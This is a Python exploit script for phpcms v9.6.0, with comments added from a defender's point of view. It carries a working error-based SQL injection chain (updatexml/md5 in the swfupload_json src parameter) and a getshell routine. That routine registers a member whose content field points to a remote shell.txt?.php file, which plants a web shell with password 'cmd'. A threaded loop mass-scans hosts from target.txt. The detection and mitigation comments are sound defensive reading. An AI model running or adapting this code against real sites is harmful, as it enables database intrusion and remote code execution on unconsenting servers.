# phpcms v9.6.0 sqli and getshell
# code by : whoam1
# blog : http://www.cnnetarmy.com
importrequests
importrandom
importstring
importhashlib
importre
importthreading
# Probe one phpcms 9.6.0 host for the error-based SQL injection named in the
# file header and report whether the marker came back.
# Defender's reading of the request chain, as written below:
#   1. GET  index.php?m=wap&c=index&a=int&siteid=1
#        -> the session cookie jar afterwards holds a cookie whose name ends in
#           "siteid"; its value is pulled out with a regex over str(dict).
#   2. POST index.php?m=attachment&c=attachments&a=swfupload_json
#        with an updatexml(...concat(...md5(<2 random digits>)...)) payload
#        URL-encoded inside the `src` parameter and the siteid value replayed as
#        the `userid_flash` form field.
#   3. GET  index.php?m=content&c=down&a_k=<substring of the Set-Cookie header>
# The host is reported injectable when the last 16 hex chars of md5(flag) appear
# in the body of response 3.
# Detection: web/WAF logs showing `updatexml(`, `concat(` or `md5(` in the `src`
# parameter of swfupload_json requests (here it arrives percent-encoded), and
# this three-request sequence from one client within seconds.
# Mitigation: apply the vendor's fix for this release (confirm the fixed version
# with the vendor) and reject non-local `src` values server-side.
# NOTE(review): the bare `except:` swallows every error, so any failure —
# including a parsing error in step 1 — is printed as 'requests error.'.
defsqli(host):
try:
url1 = '{}/index.php?m=wap&c=index&a=int&siteid=1'.format(host)
s =requests.Session()
req = s.get(url1)
# two random digits; hashed twice: once here locally, once by the injected md5()
flag = ''.join([random.choice(string.digits) for _ in range(2)])
flag_hash = hashlib.md5(flag).hexdigest()
url2 = '{}/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28md5%28{}%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26'.format(host,flag)
cookie = requests.utils.dict_from_cookiejar(s.cookies)
# regex over the dict's repr; [0] raises IndexError if no "*siteid" cookie exists
cookies = re.findall(r"siteid': '(.*?)'",str(cookie))[0]
data = {"userid_flash":cookies}
r = s.post(url=url2,data=data)
# fixed offset 61 into the raw Set-Cookie header; presumably skips a cookie prefix — unverified
a_k = r.headers['Set-Cookie'][61:]
url3 = '{}/index.php?m=content&c=down&a_k={}'.format(host,a_k)
# second half of the md5 hex digest is the success marker
if flag_hash[16:] in s.get(url3).content:
print '[*] SQL injection Ok!'
else:
print '[!] SQL injection ERROR.'
except:
print 'requests error.'
pass
# Attempt to plant a web shell on one phpcms 9.6.0 host via member registration
# and record the resulting path.
# Defender's reading of what the code does, as written below:
#   - POST index.php?m=member&c=index&a=register with a random 8-letter
#     username, a password of the form ad<8 digits>min, an @cnnetarmy.com
#     e-mail, and `info[content]` holding
#     `<img src=http://www.cnnetarmy.com/soft/shell.txt?.php#.jpg>`
#     (page-supplied remote URL; treat the host and e-mail domain as IoCs).
#   - Extract the first `lt;img src=...>` value from the response body and
#     append it to the local file sql_ok.txt.
# Detection: registration requests whose info[content] contains an external
# `<img src=` URL ending in a `.php` suffix; server-side outbound HTTP to
# www.cnnetarmy.com (the flow apparently relies on the server fetching that
# URL — confirm in the application code); new .php files under the upload
# path echoed back in the response.
# Mitigation: apply the vendor's fix (confirm the fixed version), disable or
# allow-list remote image fetching in the member module, and deny PHP
# execution in upload directories.
# NOTE(review): as in sqli(), the bare `except:` hides the real cause of any
# failure, including the IndexError when the regex finds nothing.
defgetshell(host):
try:
url = '%s/index.php?m=member&c=index&a=register&siteid=1' % host
flag = ''.join([random.choice(string.lowercase) for _ in range(8)])
flags = ''.join([random.choice(string.digits) for _ in range(8)])
# browser-like headers; the User-Agent string below is a usable log fingerprint
headers = {
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Upgrade-Insecure-Requests':'1',
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'}
# raw form body; modelid=11 and the img tag in info[content] are the
# distinctive parts for a WAF or log rule
data = "siteid=1&modelid=11&username={}&password=ad{}min&email={}@cnnetarmy.com&info%5Bcontent%5D=%3Cimg%20src=http://www.cnnetarmy.com/soft/shell.txt?.php#.jpg>&dosubmit=1&protocol=".format(flag,flags,flag)
r = requests.post(url=url,headers=headers,data=data,timeout=5)
#print r.content
# the response is expected to echo the stored image path in HTML-escaped form
shell_path = re.findall(r'lt;img src=(.*?)>',str(r.content))[0]
print '[*] shell: %s | pass is: cmd' % shell_path
# sql_ok.txt on the operator's machine is a forensic artifact listing hit targets
withopen('sql_ok.txt','a')as tar:
tar.write(shell_path)
tar.write('\n')
except:
print 'requests error.'
pass
# Entry point: mass-probe mode.  Reads one host per line from target.txt and
# starts one thread running sqli() per host; getshell() appears only in the
# commented-out single-host examples.
# Each thread is joined for at most 0.1 s, so the loop does not wait for slow
# targets and the process may exit before late responses are printed.
# target.txt is opened for reading and never closed.
# Forensic note: target.txt (target list) and sql_ok.txt (written by getshell)
# on the operator's host record scope and results of a run.
if __name__ == '__main__':
#sqli('http://127.0.0.1/phpcms960/install_package')
#getshell('http://127.0.0.1/phpcms960/install_package')
tsk = []
f =open('target.txt','r')
for i in f.readlines():
url = i.strip()
t = threading.Thread(target = sqli,args = (url,))
tsk.append(t)
for t in tsk:
t.start()
# 0.1 s cap per thread: effectively fire-and-forget
t.join(0.1)